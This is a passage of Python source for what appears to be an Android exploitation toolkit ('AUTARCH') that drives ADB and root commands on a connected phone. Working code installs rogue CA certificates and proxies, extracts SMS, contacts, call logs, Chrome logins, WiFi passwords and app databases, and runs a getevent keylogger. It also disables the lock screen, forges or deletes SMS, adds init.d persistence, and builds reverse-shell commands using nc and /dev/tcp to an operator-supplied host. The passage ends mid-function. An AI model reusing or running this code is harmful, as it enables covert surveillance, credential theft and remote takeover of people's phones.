self._shell(serial, f'settings list {ns}', timeout=10) if res['returncode'] == 0: entries = {} for line in res['output'].split('\n'): if '=' in line: k, _, v = line.partition('=') entries[k.strip()] = v.strip() settings[ns] = entries return {'success': True, 'settings': settings} # ── Network Manipulation ───────────────────────────────────────── def set_proxy(self, serial, host, port): """Set global HTTP proxy.""" res = self._shell(serial, f'settings put global http_proxy {host}:{port}') return {'success': res['returncode'] == 0, 'proxy': f'{host}:{port}'} def clear_proxy(self, serial): """Remove global proxy.""" self._shell(serial, 'settings put global http_proxy :0') self._shell(serial, 'settings delete global http_proxy') self._shell(serial, 'settings delete global global_http_proxy_host') self._shell(serial, 'settings delete global global_http_proxy_port') return {'success': True} def install_ca_cert_user(self, serial, cert_path): """Install CA certificate to user store.""" if not os.path.isfile(cert_path): return {'success': False, 'error': f'File not found: {cert_path}'} remote = '/sdcard/autarch_cert.pem' self.hw.adb_push(serial, cert_path, remote) # Open cert installer res = self._shell(serial, f'am start -a android.credentials.INSTALL -t application/x-x509-ca-cert -d file://{remote}') return {'success': True, 'note': 'Certificate install dialog opened on device. User must confirm.'} def install_ca_cert_system(self, serial, cert_path): """Install CA certificate to system store. Requires ROOT + remounted /system.""" if not os.path.isfile(cert_path): return {'success': False, 'error': f'File not found: {cert_path}'} # Convert to Android system cert format import hashlib with open(cert_path, 'rb') as f: cert_data = f.read() # Get subject hash for filename remote_tmp = '/data/local/tmp/autarch_ca.pem' self.hw.adb_push(serial, cert_path, remote_tmp) # Calculate hash and install res = self._shell(serial, f'su -c "' f'mount -o remount,rw /system 2>/dev/null; ' f'HASH=$(openssl x509 -subject_hash_old -in {remote_tmp} 2>/dev/null | head -1); ' f'cp {remote_tmp} /system/etc/security/cacerts/${{HASH}}.0 2>/dev/null && ' f'chmod 644 /system/etc/security/cacerts/${{HASH}}.0 && ' f'mount -o remount,ro /system 2>/dev/null; ' f'echo DONE"') success = 'DONE' in res['output'] self._shell(serial, f'rm {remote_tmp}') return {'success': success, 'output': res['output'], 'note': 'Reboot required for system certs to take effect' if success else ''} def get_network_info(self, serial): """Get comprehensive network information.""" info = {} res = self._shell(serial, 'ip addr show 2>/dev/null') info['interfaces'] = res['output'].strip() if res['returncode'] == 0 else '' res = self._shell(serial, 'ip route show 2>/dev/null') info['routes'] = res['output'].strip() if res['returncode'] == 0 else '' res = self._shell(serial, 'getprop net.dns1') info['dns1'] = res['output'].strip() res = self._shell(serial, 'getprop net.dns2') info['dns2'] = res['output'].strip() res = self._shell(serial, 'settings get global http_proxy') info['proxy'] = res['output'].strip() res = self._shell(serial, 'dumpsys connectivity 2>/dev/null | head -30', timeout=10) info['connectivity'] = res['output'].strip() if res['returncode'] == 0 else '' return info def set_dns(self, serial, dns1, dns2=''): """Set DNS servers. Requires ROOT.""" cmds = [f'su -c "setprop net.dns1 {dns1}"'] if dns2: cmds.append(f'su -c "setprop net.dns2 {dns2}"') cmds.append(f'su -c "ndc resolver setnetdns 0 \"\" {dns1} {dns2}"') results = [] for c in cmds: r = self._shell(serial, c) results.append(r['output'].strip()) return {'success': True, 'dns1': dns1, 'dns2': dns2} def wifi_scan(self, serial): """Scan for nearby WiFi networks.""" # Android 9+ uses cmd wifi res = self._shell(serial, 'cmd wifi start-scan 2>/dev/null; sleep 2; cmd wifi list-scan-results 2>/dev/null', timeout=15) if res['returncode'] == 0 and res['output'].strip(): return {'success': True, 'output': res['output'].strip()} # Fallback: dumpsys res = self._shell(serial, 'dumpsys wifi | grep -A 2 "SSID:" 2>/dev/null', timeout=10) return {'success': res['returncode'] == 0, 'output': res['output'].strip()} def wifi_connect(self, serial, ssid, password='', security='wpa'): """Connect to a WiFi network. Android 10+ uses cmd wifi.""" if password: cmd = f'cmd wifi connect-network "{ssid}" {security} "{password}" 2>/dev/null' else: cmd = f'cmd wifi connect-network "{ssid}" open 2>/dev/null' res = self._shell(serial, cmd, timeout=15) return {'success': res['returncode'] == 0, 'ssid': ssid, 'output': res['output'].strip()} def wifi_disconnect(self, serial): """Disconnect from WiFi.""" res = self._shell(serial, 'cmd wifi set-wifi-enabled disabled 2>/dev/null; svc wifi disable 2>/dev/null') return {'success': True} def wifi_enable(self, serial): """Enable WiFi.""" res = self._shell(serial, 'cmd wifi set-wifi-enabled enabled 2>/dev/null; svc wifi enable 2>/dev/null') return {'success': True} def enable_hotspot(self, serial, ssid='AUTARCH_AP', password='autarch123'): """Enable WiFi hotspot. Android 10+.""" # Try cmd connectivity tethering res = self._shell(serial, f'cmd wifi start-softap autarch_sap {ssid} wpa2-psk "{password}" 2>/dev/null') if res['returncode'] != 0: # Fallback res = self._shell(serial, 'svc wifi startTethering 2>/dev/null') return {'success': True, 'ssid': ssid, 'output': res['output'].strip()} def capture_traffic(self, serial, interface='any', duration=30, pcap_filter=''): """Capture network traffic via tcpdump. Requires ROOT or tcpdump binary.""" duration = min(int(duration), 300) remote_pcap = '/data/local/tmp/capture.pcap' filt = f' {pcap_filter}' if pcap_filter else '' cmd = f'su -c "timeout {duration} tcpdump -i {interface} -w {remote_pcap}{filt}" 2>/dev/null' res = self._shell(serial, cmd, timeout=duration + 10) out_dir = self._serial_dir('recon', serial) local = str(out_dir / f'capture_{int(time.time())}.pcap') result = self.hw.adb_pull(serial, remote_pcap, local) self._shell(serial, f'rm {remote_pcap}') if result['success'] and os.path.exists(local): return {'success': True, 'path': local, 'size': os.path.getsize(local)} return {'success': False, 'error': 'Capture failed (need root + tcpdump)'} def port_forward(self, serial, local_port, remote_port): """Set up ADB port forwarding.""" stdout, stderr, rc = self.hw._run_adb( ['forward', f'tcp:{local_port}', f'tcp:{remote_port}'], serial=serial, timeout=10) return {'success': rc == 0, 'local': local_port, 'remote': remote_port, 'output': stdout or stderr} def port_forward_list(self, serial): """List active port forwards.""" stdout, stderr, rc = self.hw._run_adb(['forward', '--list'], serial=serial, timeout=5) forwards = [] if rc == 0: for line in (stdout or '').strip().split('\n'): parts = line.strip().split() if len(parts) >= 3: forwards.append({'serial': parts[0], 'local': parts[1], 'remote': parts[2]}) return {'success': True, 'forwards': forwards} def enable_adb_wifi(self, serial, port=5555): """Enable ADB over WiFi.""" stdout, stderr, rc = self.hw._run_adb(['tcpip', str(port)], serial=serial, timeout=10) # Get device IP res = self._shell(serial, 'ip route | grep wlan0 | grep src | awk "{print $NF}"') ip = res['output'].strip().split('\n')[-1].strip() if res['returncode'] == 0 else '?' return {'success': rc == 0, 'port': port, 'ip': ip, 'connect_cmd': f'adb connect {ip}:{port}'} # ── App Manipulation ───────────────────────────────────────────── def grant_permission(self, serial, package, permission): """Grant a runtime permission to an app.""" res = self._shell(serial, f'pm grant {package} {permission}') return {'success': res['returncode'] == 0, 'package': package, 'permission': permission, 'output': res['output'].strip()} def revoke_permission(self, serial, package, permission): """Revoke a runtime permission from an app.""" res = self._shell(serial, f'pm revoke {package} {permission}') return {'success': res['returncode'] == 0, 'package': package, 'permission': permission, 'output': res['output'].strip()} def list_permissions(self, serial, package): """List all permissions for a package.""" res = self._shell(serial, f'dumpsys package {package} 2>/dev/null | grep -A 200 "granted=true"', timeout=10) granted = [] denied = [] if res['returncode'] == 0: for line in res['output'].split('\n'): line = line.strip() if 'granted=true' in line: perm = line.split(':')[0].strip() if ':' in line else line.split()[0] granted.append(perm) elif 'granted=false' in line: perm = line.split(':')[0].strip() if ':' in line else line.split()[0] denied.append(perm) return {'success': True, 'package': package, 'granted': granted, 'denied': denied} def disable_app(self, serial, package): """Disable (freeze) an app.""" res = self._shell(serial, f'pm disable-user --user 0 {package}') return {'success': res['returncode'] == 0, 'package': package, 'output': res['output'].strip()} def enable_app(self, serial, package): """Enable a disabled app.""" res = self._shell(serial, f'pm enable {package}') return {'success': res['returncode'] == 0, 'package': package, 'output': res['output'].strip()} def clear_app_data(self, serial, package): """Clear all data for an app.""" res = self._shell(serial, f'pm clear {package}') return {'success': 'Success' in res['output'], 'package': package, 'output': res['output'].strip()} def force_stop_app(self, serial, package): """Force stop an app.""" res = self._shell(serial, f'am force-stop {package}') return {'success': res['returncode'] == 0, 'package': package} def launch_app(self, serial, package): """Launch an app.""" res = self._shell(serial, f'monkey -p {package} -c android.intent.category.LAUNCHER 1 2>/dev/null') return {'success': res['returncode'] == 0, 'package': package} def launch_activity(self, serial, component, extras=''): """Start a specific activity. component format: com.pkg/.Activity""" cmd = f'am start -n {component}' if extras: cmd += f' {extras}' res = self._shell(serial, cmd) return {'success': res['returncode'] == 0, 'component': component, 'output': res['output'].strip()} def send_broadcast(self, serial, action, extras=''): """Send a broadcast intent.""" cmd = f'am broadcast -a {action}' if extras: cmd += f' {extras}' res = self._shell(serial, cmd) return {'success': res['returncode'] == 0, 'action': action, 'output': res['output'].strip()} def content_query(self, serial, uri, projection='', where=''): """Query any content provider.""" cmd = f'content query --uri {uri}' if projection: cmd += f' --projection {projection}' if where: cmd += f' --where "{where}"' res = self._shell(serial, cmd, timeout=15) rows = [] if res['returncode'] == 0: for line in res['output'].split('\n'): if 'Row:' in line: entry = {} for m in re.finditer(r'(\w+)=([^,\n]+)', line): entry[m.group(1)] = m.group(2).strip() rows.append(entry) return {'success': True, 'uri': uri, 'rows': rows, 'count': len(rows)} def overlay_attack_enable(self, serial, package): """Grant SYSTEM_ALERT_WINDOW to an app (overlay/tapjacking).""" res = self._shell(serial, f'appops set {package} SYSTEM_ALERT_WINDOW allow') return {'success': res['returncode'] == 0, 'package': package} # ── System Control ─────────────────────────────────────────────── def set_selinux(self, serial, mode='permissive'): """Set SELinux mode. Requires ROOT.""" val = '0' if mode == 'permissive' else '1' res = self._shell(serial, f'su -c "setenforce {val}"') verify = self._shell(serial, 'getenforce') return {'success': res['returncode'] == 0, 'mode': verify['output'].strip()} def remount_system(self, serial, rw=True): """Remount /system. Requires ROOT.""" mode = 'rw' if rw else 'ro' res = self._shell(serial, f'su -c "mount -o remount,{mode} /system"') return {'success': res['returncode'] == 0, 'mode': mode, 'output': res['output'].strip()} def logcat_sensitive(self, serial, duration=10): """Capture logcat and grep for sensitive data (passwords, tokens, keys).""" patterns = 'password|token|secret|api.key|bearer|session|credential|auth' res = self._shell(serial, f'timeout {duration} logcat -d 2>/dev/null | grep -iE "{patterns}"', timeout=duration + 5) lines = [l.strip() for l in res['output'].split('\n') if l.strip()] return {'success': True, 'lines': lines, 'count': len(lines)} def deploy_frida(self, serial, frida_path): """Deploy and start Frida server. Requires ROOT.""" if not os.path.isfile(frida_path): return {'success': False, 'error': f'File not found: {frida_path}'} remote = '/data/local/tmp/frida-server' result = self.hw.adb_push(serial, frida_path, remote) if not result['success']: return {'success': False, 'error': 'Push failed'} self._shell(serial, f'su -c "chmod 755 {remote}"') self._shell(serial, f'su -c "nohup {remote} &" 2>/dev/null') time.sleep(1) # Verify running check = self._shell(serial, 'su -c "pgrep frida"') running = check['returncode'] == 0 and check['output'].strip() return {'success': running, 'pid': check['output'].strip(), 'path': remote} def get_running_processes(self, serial): """List running processes.""" res = self._shell(serial, 'ps -A -o PID,USER,NAME 2>/dev/null || ps', timeout=10) procs = [] for line in res['output'].split('\n')[1:]: parts = line.split() if len(parts) >= 3: procs.append({'pid': parts[0], 'user': parts[1], 'name': ' '.join(parts[2:])}) elif len(parts) == 2: procs.append({'pid': parts[0], 'name': parts[1]}) return {'success': True, 'processes': procs, 'count': len(procs)} def get_open_ports(self, serial): """List open network ports.""" res = self._shell(serial, 'netstat -tlnp 2>/dev/null || ss -tlnp 2>/dev/null', timeout=10) ports = [] for line in res['output'].split('\n'): line = line.strip() if ':' in line and ('LISTEN' in line or 'tcp' in line.lower()): ports.append(line) return {'success': True, 'ports': ports, 'count': len(ports), 'raw': res['output']} def modify_setting(self, serial, namespace, key, value): """Modify an Android setting. namespace: system/secure/global.""" if namespace not in ('system', 'secure', 'global'): return {'success': False, 'error': f'Invalid namespace: {namespace}'} res = self._shell(serial, f'settings put {namespace} {key} {value}') # Verify verify = self._shell(serial, f'settings get {namespace} {key}') return {'success': res['returncode'] == 0, 'namespace': namespace, 'key': key, 'value': verify['output'].strip()} def get_device_fingerprint(self, serial): """Comprehensive device fingerprint for identification.""" fp = {} props = { 'model': 'ro.product.model', 'brand': 'ro.product.brand', 'device': 'ro.product.device', 'board': 'ro.product.board', 'manufacturer': 'ro.product.manufacturer', 'android': 'ro.build.version.release', 'sdk': 'ro.build.version.sdk', 'security_patch': 'ro.build.version.security_patch', 'build_id': 'ro.build.display.id', 'fingerprint': 'ro.build.fingerprint', 'build_type': 'ro.build.type', 'abi': 'ro.product.cpu.abi', 'serial_internal': 'ro.serialno', 'bootloader': 'ro.bootloader', 'hardware': 'ro.hardware', 'baseband': 'gsm.version.baseband', 'first_api': 'ro.product.first_api_level', } for key, prop in props.items(): r = self._shell(serial, f'getprop {prop}') if r['returncode'] == 0: fp[key] = r['output'].strip() # IMEI (needs phone permission or root) r = self._shell(serial, 'service call iphonesubinfo 1 2>/dev/null') if r['returncode'] == 0 and "'" in r['output']: imei_parts = re.findall(r"'(.+?)'", r['output']) fp['imei_raw'] = ''.join(imei_parts).replace('.', '').strip() # MAC r = self._shell(serial, 'cat /sys/class/net/wlan0/address 2>/dev/null') fp['mac_wifi'] = r['output'].strip() if r['returncode'] == 0 else '' # Android ID r = self._shell(serial, 'settings get secure android_id') fp['android_id'] = r['output'].strip() return fp def dump_database(self, serial, db_path, table=None, limit=100): """Pull and query any SQLite database from device. Requires ROOT for app databases.""" out_dir = self._serial_dir('recon', serial) tmp = '/data/local/tmp/_db_dump' self._shell(serial, f'su -c "cp {db_path} {tmp} && chmod 644 {tmp}" 2>/dev/null') # If that fails, try direct (for world-readable DBs) self._shell(serial, f'cp {db_path} {tmp} 2>/dev/null') local = str(out_dir / f'db_{os.path.basename(db_path)}') r = self.hw.adb_pull(serial, tmp, local) self._shell(serial, f'rm {tmp}') if not r['success'] or not os.path.exists(local): return {'success': False, 'error': 'Cannot pull database'} try: conn = sqlite3.connect(local) cur = conn.cursor() # List tables cur.execute("SELECT name FROM sqlite_master WHERE type='table'") tables = [row[0] for row in cur.fetchall()] rows = [] if table and table in tables: cur.execute(f'SELECT * FROM "{table}" LIMIT {limit}') cols = [d[0] for d in cur.description] for row in cur.fetchall(): rows.append(dict(zip(cols, [str(v) for v in row]))) conn.close() return {'success': True, 'tables': tables, 'rows': rows, 'table_queried': table, 'db_path': local} except Exception as e: return {'success': False, 'error': str(e)} # ── WebUSB Direct Mode: Command Relay ──────────────────────────── def get_commands_for_op(self, op: str, params: dict) -> dict: """Return ADB shell command(s) for a given operation without executing them. Used by WebUSB Direct mode so the browser can execute via navigator.usb. Returns one of: {'commands': ['cmd1', ...]} — execute each via adbShell in order {'pullPath': '/device/path'} — pull this file from device {'error': 'message'} — unsupported or invalid params """ p = params or {} serial = p.get('serial', '') # ignored in direct mode but kept for parity # ── Apps ── if op == '/apps/list': flag = '' if p.get('include_system') else '-3' return {'commands': [f'pm list packages -f {flag}']} if op == '/apps/pull-apk': pkg = p.get('package', '').strip() if not pkg: return {'error': 'No package provided'} return {'commands': [f'pm path {pkg}']} # JS gets path, then needs second pull if op == '/apps/pull-data': pkg = p.get('package', '').strip() if not pkg: return {'error': 'No package provided'} cmds = [] for sub in ('databases', 'shared_prefs', 'files'): cmds.append(f'run-as {pkg} ls /data/data/{pkg}/{sub}/ 2>/dev/null') return {'commands': cmds} if op == '/apps/shared-prefs': pkg = p.get('package', '').strip() if not pkg: return {'error': 'No package provided'} return {'commands': [ f'run-as {pkg} ls /data/data/{pkg}/shared_prefs/ 2>/dev/null', ]} # ── Recon ── if op == '/recon/device-dump': return {'commands': [ 'getprop', 'getenforce 2>/dev/null', 'uname -a', 'getprop ro.build.fingerprint', 'ip addr show 2>/dev/null || ifconfig', 'pm list packages | wc -l', ]} if op == '/recon/accounts': return {'commands': ['dumpsys account 2>/dev/null']} if op == '/recon/wifi': return {'commands': [ 'su -c "cat /data/misc/wifi/WifiConfigStore.xml" 2>/dev/null', 'su -c "cat /data/misc/wifi/wpa_supplicant.conf" 2>/dev/null', ]} if op == '/recon/calls': limit = int(p.get('limit', 200)) return {'commands': [ f'content query --uri content://call_log/calls ' f'--projection number:type:date:duration --sort "date DESC" 2>/dev/null' ]} if op == '/recon/sms': return {'commands': [ 'content query --uri content://sms/ ' '--projection address:body:date:type --sort "date DESC" 2>/dev/null' ]} if op == '/recon/contacts': return {'commands': [ 'content query --uri content://contacts/phones/ ' '--projection display_name:number 2>/dev/null' ]} if op == '/recon/browser': return {'commands': [ 'su -c "cp /data/data/com.android.chrome/app_chrome/Default/History ' '/data/local/tmp/_ch && chmod 644 /data/local/tmp/_ch" 2>/dev/null', 'ls /data/local/tmp/_ch 2>/dev/null', ]} if op == '/recon/credentials': return {'commands': [ "su -c \"cp '/data/data/com.android.chrome/app_chrome/Default/Login Data' " "/data/local/tmp/_cl && chmod 644 /data/local/tmp/_cl\" 2>/dev/null", ]} if op == '/recon/export': return {'commands': [ 'getprop ro.product.model', 'content query --uri content://sms/ --projection address:body:date:type --sort "date DESC" 2>/dev/null', 'content query --uri content://contacts/phones/ --projection display_name:number 2>/dev/null', 'content query --uri content://call_log/calls --projection number:type:date:duration --sort "date DESC" 2>/dev/null', ]} # ── Payloads ── if op == '/payload/deploy': return {'error': 'Payload deploy requires server mode (needs local file access)'} if op == '/payload/execute': remote_path = p.get('remote_path', '').strip() args = p.get('args', '').strip() background = p.get('background', True) if not remote_path: return {'error': 'No remote_path provided'} if background: return {'commands': [f'nohup {remote_path} {args} > /dev/null 2>&1 & echo $!']} return {'commands': [f'{remote_path} {args}']} if op == '/payload/reverse-shell': lhost = p.get('lhost', '').strip() lport = p.get('lport', '4444') method = p.get('method', 'nc') if not lhost: return {'error': 'No lhost provided'} if method == 'nc': cmd = f'nohup sh -c "nc {lhost} {lport} -e /system/bin/sh" > /dev/null 2>&1 &' elif method == 'bash': cmd = f'nohup sh -c "bash -i >& /dev/tcp/{lhost}/{lport} 0>&1" > /dev/null 2>&1 &' else: return {'error': f'Unknown method: {method}'} return {'commands': [cmd]} if op == '/payload/persistence': return {'commands': [ 'su -c "mkdir -p /system/etc/init.d && ' 'echo \'#!/system/bin/sh\' > /system/etc/init.d/99autarch && ' 'chmod 755 /system/etc/init.d/99autarch"' ]} if op == '/payload/list': return {'commands': ['ps -ef 2>/dev/null || ps']} if op == '/payload/kill': pid = str(p.get('pid', '')).strip() if not pid: return {'error': 'No pid provided'} return {'commands': [f'kill {pid} 2>/dev/null || su -c "kill {pid}"']} # ── Boot / Recovery ── if op == '/boot/info': return {'commands': ['getprop ro.build.version.release', 'getprop ro.bootloader', 'getprop ro.secure', 'getprop ro.debuggable']} if op == '/boot/backup': return {'error': 'Boot backup requires server mode (pulls binary to server)'} if op == '/boot/unlock': return {'error': 'Bootloader unlock requires server mode (fastboot command)'} if op == '/boot/flash-recovery': return {'error': 'Flash recovery requires server mode (fastboot + local image file)'} if op == '/boot/flash-boot': return {'error': 'Flash boot requires server mode (fastboot + local image file)'} if op == '/boot/temp-boot': return {'error': 'Temp boot requires server mode (fastboot + local image file)'} if op == '/boot/disable-verity': return {'commands': ['adb disable-verity 2>/dev/null || echo "Run from host ADB"']} # ── Root ── if op == '/root/check': return {'commands': [ 'su -c id 2>/dev/null', 'ls /data/adb/magisk/ 2>/dev/null', 'pm list packages | grep -i magisk 2>/dev/null', 'ls /system/xbin/su 2>/dev/null', 'getprop ro.build.type', ]} if op == '/root/install-magisk': return {'error': 'Magisk install requires server mode (needs APK on server)'} if op == '/root/pull-patched': return {'commands': ['ls -t /sdcard/Download/magisk_patched*.img 2>/dev/null']} if op == '/root/exploit': return {'error': 'Root exploit requires server mode (needs binary on server)'} # ── SMS ── if op == '/sms/list': address = p.get('address', '') cmd = ('content query --uri content://sms/ ' '--projection _id:address:body:date:type:read --sort "date DESC"') return {'commands': [cmd]} if op == '/sms/insert': address = p.get('address', '').strip() body = p.get('body', '').strip() if not address or not body: return {'error': 'address and body required'} date_ms = int(time.time() * 1000) type_map = {'inbox': 1, 'sent': 2, 'draft': 3} type_val = type_map.get(str(p.get('type', 'inbox')), 1) read_val = 1 if p.get('read', True) else 0 body_esc = body.replace("'", "'\\''") cmds = [ 'appops set com.android.shell WRITE_SMS allow', (f"content insert --uri content://sms/" f" --bind address:s:'{address}'" f" --bind body:s:'{body_esc}'" f" --bind date:l:{date_ms}" f" --bind type:i:{type_val}" f" --bind read:i:{read_val}" f" --bind seen:i:1"), ] return {'commands': cmds} if op == '/sms/bulk-insert': return {'error': 'Bulk SMS insert requires server mode'} if op == '/sms/update': sms_id = p.get('id', '').strip() body = p.get('body', '').strip() if not sms_id or not body: return {'error': 'id and body required'} body_esc = body.replace("'", "'\\''") cmds = [ 'appops set com.android.shell WRITE_SMS allow', f"content update --uri content://sms/{sms_id} --bind body:s:'{body_esc}'", ] return {'commands': cmds} if op == '/sms/delete': sms_id = p.get('id', '').strip() if not sms_id: return {'error': 'id required'} return {'commands': [ 'appops set com.android.shell WRITE_SMS allow', f'content delete --uri content://sms/{sms_id}', ]} if op == '/sms/delete-all': return {'commands': [ 'appops set com.android.shell WRITE_SMS allow', 'content delete --uri content://sms/', ]} # ── RCS ── if op == '/rcs/check': return {'commands': [ 'pm list packages | grep com.google.android.apps.messaging', 'pm list packages | grep com.android.messaging', ]} if op in ('/rcs/list', '/rcs/insert', '/rcs/delete'): return {'error': 'RCS operations require server mode (SQLite database manipulation)'} # ── Screen & Input ── if op == '/screen/capture': return {'commands': [ 'screencap -p /data/local/tmp/_sc.png 2>/dev/null && ' 'base64 /data/local/tmp/_sc.png && ' 'rm /data/local/tmp/_sc.png' ]} if op == '/screen/record': dur = min(int(p.get('duration', 10)), 180) size = p.get('size', '1280x720') return {'error': 'Screen record requires server mode (binary file too large for inline transfer)'} if op == '/screen/tap': x, y = p.get('x', 0), p.get('y', 0) return {'commands': [f'input tap {x} {y}']} if op == '/screen/swipe': x1, y1, x2, y2 = p.get('x1', 0), p.get('y1', 0), p.get('x2', 0), p.get('y2', 0) dur = p.get('duration_ms', 300) return {'commands': [f'input swipe {x1} {y1} {x2} {y2} {dur}']} if op == '/screen/text': text = p.get('text', '').replace(' ', '%s').replace('&', '\\&').replace(';', '\\;') return {'commands': [f'input text "{text}"']} if op == '/screen/key': keycode = p.get('keycode', 3) return {'commands': [f'input keyevent {keycode}']} if op == '/screen/dismiss-lock': return {'commands': [ 'input keyevent 26', 'input keyevent 82', 'input swipe 540 1800 540 400 300', ]} if op == '/screen/disable-lock': return {'commands': [ 'settings put secure lockscreen.disabled 1', 'locksettings set-disabled true 2>/dev/null', ]} if op == '/screen/keylogger-start': return {'commands': [ 'nohup sh -c "getevent -lt > /data/local/tmp/keylog.txt 2>&1" &', 'pgrep -f "getevent -lt"', ]} if op == '/screen/keylogger-stop': return {'commands': [ 'pkill -f "getevent -lt"', 'cat /data/local/tmp/keylog.txt 2>/dev/null', 'rm /data/local/tmp/keylog.txt 2>/dev/null', ]} # ── Advanced ── if op == '/adv/clipboard': return {'commands': ['service call clipboard 2 i32 1 i32 0 2>/dev/null']} if op == '/adv/notifications': return {'commands': ['dumpsys notification --noredact 2>/dev/null']} if op == '/adv/location': return {'commands': [ 'dumpsys location 2>/dev/null', 'settings get secure location_mode', 'settings get secure location_providers_allowed', ]} if op == '/adv/fingerprint': props = [ 'ro.product.model', 'ro.product.brand', 'ro.product.device', 'ro.product.manufacturer', 'ro.build.version.release', 'ro.build.version.sdk', 'ro.build.display.id', 'ro.build.fingerprint', 'ro.build.type', 'ro.product.cpu.abi', 'ro.serialno', ] cmds = [f'getprop {prop}' for prop in props] cmds.append('cat /sys/class/net/wlan0/address 2>/dev/null') cmds.append('settings get secure android_id') return {'commands': cmds} if op == '/adv/settings': return {'commands': [ 'settings list system', 'settings list secure', 'settings list global', ]} if op == '/adv/media-list': media_type = p.get('media_type', 'photos') paths = { 'photos': '/sdcard/DCIM/Camera/', 'downloads': '/sdcard/Download/', 'screenshots': '/sdcard/Pictures/Screenshots/', 'whatsapp_media': '/sdcard/WhatsApp/Media/', 'telegram_media': '/sdcard/Telegram/', } path = paths.get(media_type, f'/sdcard/{media_type}/') return {'commands': [f'ls -lhS {path} 2>/dev/null']} if op == '/adv/media-pull': return {'error': 'Media pull requires server mode (pulls files to server directory)'} if op in ('/adv/whatsapp', '/adv/telegram', '/adv/signal'): return {'error': f'{op} database extraction requires server mode (SQLite + binary file transfer)'} if op == '/adv/network-info': return {'commands': [ 'ip addr show 2>/dev/null', 'ip route show 2>/dev/null', 'getprop net.dns1', 'getprop net.dns2', 'settings get global http_proxy', ]} if op == '/adv/proxy-set': host = p.get('host', '').strip() port = p.get('port', '8080') if not host: return {'error': 'No host provided'} return {'commands': [f'settings put global http_proxy {host}:{port}']} if op == '/adv/proxy-clear': return {'commands': [ 'settings put global http_proxy :0', 'settings delete global http_proxy', 'settings delete global global_http_proxy_host', 'settings delete global global_http_proxy_port', ]} if op == '/adv/wifi-scan': return {'commands': [ 'cmd wifi start-scan 2>/dev/null; sleep 2; cmd wifi list-scan-results 2>/dev/null' ]} if op == '/adv/wifi-connect': ssid = p.get('ssid', '').strip() password = p.get('password', '') security = p.get('security', 'wpa') if not ssid: return {'error': 'No SSID provided'} if password: return {'commands': [f'cmd wifi connect-network "{ssid}" {security} "{password}" 2>/dev/null']} return {'commands': [f'cmd wifi connect-network "{ssid}" open 2>/dev/null']} if op == '/adv/adb-wifi': port = int(p.get('port', 5555)) return {'commands': [ f'setprop service.adb.tcp.port {port}', 'stop adbd; start adbd', 'ip route | grep wlan0 | grep src', ]} if op == '/adv/capture-traffic': return {'error': 'Traffic capture requires server mode (pulls .pcap to server)'} if op == '/adv/selinux': mode = p.get('mode', 'permissive') val = '0' if mode == 'permissive' else '1' return {'commands': [f'su -c "setenforce {val}"', 'getenforce']} if op == '/adv/remount': return {'commands': ['su -c "mount -o remount,rw /system"']} if op == '/adv/logcat-sensitive': dur = int(p.get('duration', 10)) patterns = 'password|token|secret|api.key|bearer|session|credential|auth' return {'commands': [f'timeout {dur} logcat -d 2>/dev/null | grep -iE "{patterns}"']} if op == '/adv/processes': return {'commands': ['ps -A -o PID,USER,NAME 2>/dev/null || ps']} if op == '/adv/ports': return {'commands': ['netstat -tlnp 2>/dev/null || ss -tlnp 2>/dev/null']} if op == '/adv/modify-setting': ns = p.get('namespace', 'global') key = p.get('key', '').strip() value = p.get('value', '').strip() if ns not in ('system', 'secure', 'global') or not key: return {'error': 'Invalid namespace or missing key'} return {'commands': [ f'settings put {ns} {key} {value}', f'settings get {ns} {key}', ]} if op == '/adv/app-launch': pkg = p.get('package', '').strip() if not pkg: return {'error': 'No package provided'} return {'commands': [f'monkey -p {pkg} -c android.intent.category.LAUNCHER 1 2>/dev/null']} if op == '/adv/app-disable': pkg = p.get('package', '').strip() if not pkg: return {'error': 'No package provided'} return {'commands': [f'pm disable-user --user 0 {pkg}']} if op == '/adv/app-enable': pkg = p.get('package', '').strip() if not pkg: return {'error': 'No package provided'} return {'commands': [f'pm enable {pkg}']} if op == '/adv/app-clear': pkg = p.get('package', '').strip() if not pkg: return {'error': 'No package provided'} return {'commands': [f'pm clear {pkg}']} if op == '/adv/content-query': uri = p.get('uri', '').strip() if not uri: return {'error': 'No URI provided'} cmd = f'content query --uri {uri}' proj = p.get('projection', '') where = p.get('where', '') if proj: cmd += f' --projection {proj}' if where: cmd += f' --where "{where}"' return {'commands': [cmd]} return {'error': f'Unknown or unsupported operation for direct mode: {op}'} def parse_op_output(self, op: str, params: dict, raw: str) -> dict: """Parse raw ADB shell output from WebUSB Direct mode. Reuses the same parsing logic as the regular methods but feeds in the raw text that the browser collected via adbShell(). Returns the same structured JSON the server-mode route would return. """ p = params or {} lines = raw.strip().split('\n') if raw.strip() else [] # ── Apps ── if op == '/apps/list': packages = [] for line in lines: line = line.strip() if not line.startswith('package:'): continue rest = line[len('package:'):] if '=' in rest: path, pkg = rest.rsplit('=', 1) is_sys = path.startswith('/system') or path.startswith('/product') packages.append({'package': pkg, 'path': path, 'is_system': is_sys}) return {'packages': packages, 'count': len(packages)} if op == '/apps/pull-apk': # raw contains output of `pm path ` — extract path for UI to show apk_path = '' for line in lines: line = line.strip().replace('package:', '') if line: apk_path = line break return {'success': bool(apk_path), 'remote_path': apk_path, 'note': 'Use adbPull in browser to download the APK directly.' if apk_path else 'Package not found'} if op == '/apps/shared-prefs': files = [l.strip() for l in lines if l.strip().endswith('.xml')] return {'success': len(files) > 0, 'files': files, 'raw': raw} # ── Recon ── if op == '/recon/device-dump': dump = {'raw_output': raw} props = {} for line in lines: m = re.match(r'\[(.+?)\]:\s*\[(.+?)\]', line) if m: props[m.group(1)] = m.group(2) if props: dump['properties'] = props return dump if op == '/recon/accounts': accounts = [] seen = set() for line in lines: m = re.search(r'Account\s*\{name=(.+?),\s*type=(.+?)\}', line) if m: key = f"{m.group(1)}:{m.group(2)}" if key not in seen: seen.add(key) accounts.append({'name': m.group(1), 'type': m.group(2)}) return {'success': True, 'accounts': accounts, 'count': len(accounts)} if op in ('/recon/calls', '/sms/list', '/recon/sms'): type_map = {'1': 'incoming' if op == '/recon/calls' else 'inbox', '2': 'outgoing' if op == '/recon/calls' else 'sent', '3': 'missed' if op == '/recon/calls' else 'draft', '4': 'voicemail' if op == '/recon/calls' else 'outbox'} key = 'calls' if op == '/recon/calls' else 'messages' items = [] for line in lines: if 'Row:' not in line: continue entry = {} for m in re.finditer(r'(\w+)=([^,\n]+)', line): entry[m.group(1)] = m.group(2).strip() if entry: entry['type_label'] = type_map.get(entry.get('type', ''), 'unknown') try: ts = int(entry.get('date', 0)) if ts > 0: entry['date_readable'] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(ts / 1000)) except (ValueError, 